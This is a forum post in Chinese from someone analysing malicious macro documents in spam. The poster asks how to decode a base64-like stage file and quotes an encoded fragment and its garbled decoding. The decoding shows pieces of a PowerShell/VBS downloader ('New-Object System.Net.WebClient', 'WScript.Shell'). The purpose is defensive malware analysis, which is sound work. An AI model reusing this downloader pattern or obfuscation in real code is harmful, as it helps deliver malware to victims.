大家。 请帮助我打击针对垃圾邮件/恶意软件的小型个人战争。我收到的垃圾邮件显然是带有.doc账单或发票形式的虚假附件。 这个假文档包含我能够使用各种工具解密的宏代码。通常,此类代码会尝试下载一个实际上是VBA代码的编写文本文件,如果执行该代码,则会尝试以EXE文件的形式下载真正的恶意软件。 加密的文本文件通常是一个简单的base64编码字符串。 使用普通的base64编码/解码工具足以解密内容并识别恶意软件试图从中下载exe病毒的IP地址。 最近发生了变化。现在加密的文本文件包含显然是base64编码,但事实并非如此。 内容类似于:
PAB0AGUAeAB0ADEAMAA+ACQAaAB5AGcAcQB1AGQAZwBhAGgAcwA9ACcAbgB1AGQAcQBoAHcA
aQB1AGQAaABxAHcAZABxAHcAJwA7AA0ACgAkAGcAZgB5AHcAdQBnAGgAYQBtAHMAPQAnADEA
MgBqAGgAMwBnADEAMgBoACAAMQAyAGcAMwBqAGgAMQAyADMAMQAyADMAJwA7AA0ACgAkAGQA
...
aQBoAHcAZAB1AGkAcQB3AHUAZABxAHcAaQAgAGgAZABxAHcAaABkACIADQAKAFMAZQB0ACAA
bwBiAGoAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAIgBXAFMA
YwByAGkAcAB0AC4AUwBoAGUAbABsACIAKQA8AC8AcwB0AGUAeAB0ADMAPgA=
类似于base64编码。但是如果您尝试使用base64对其进行解码,则会得到类似的结果:
<^@t^@e^@x^@t^@1^@0^@>^@$^@h^@y^@g^@q^@u^@d^@g^@a^@h^@s^@=^@'^@n^@u^@d^@q^@h^@w^@i^@u^@d^@h^@q^@w^@d^@q^@w^@'^@;^@
^@
^@$^@g^@f^@y^@w^@u^@g^@h^@a^@m^@s^@=^@'^@1^@2^@j^@h^@3^@g^@1^@2^@h^@ ^@1^@2^@g^@3^@j^@h^@1^@2^@3^@1^@2^@3^@'^@;^@
^@
^@$^@d^@o^@w^@n^@ ^@=^@ ^@N^@e^@w^@-^@O^@b^@j^@e^@c^@t^@ ^@S^@y^@s^@t^@e^@m^@.^@N^@e^@t^@.^@W^@e^@b^@C^@l^@i^@e^@n^@t^@;^@
而不是纯文本(下载exe文件的VBS代码)。 任何人都可以帮我找到解码这种污垢的方法吗? 提前谢谢!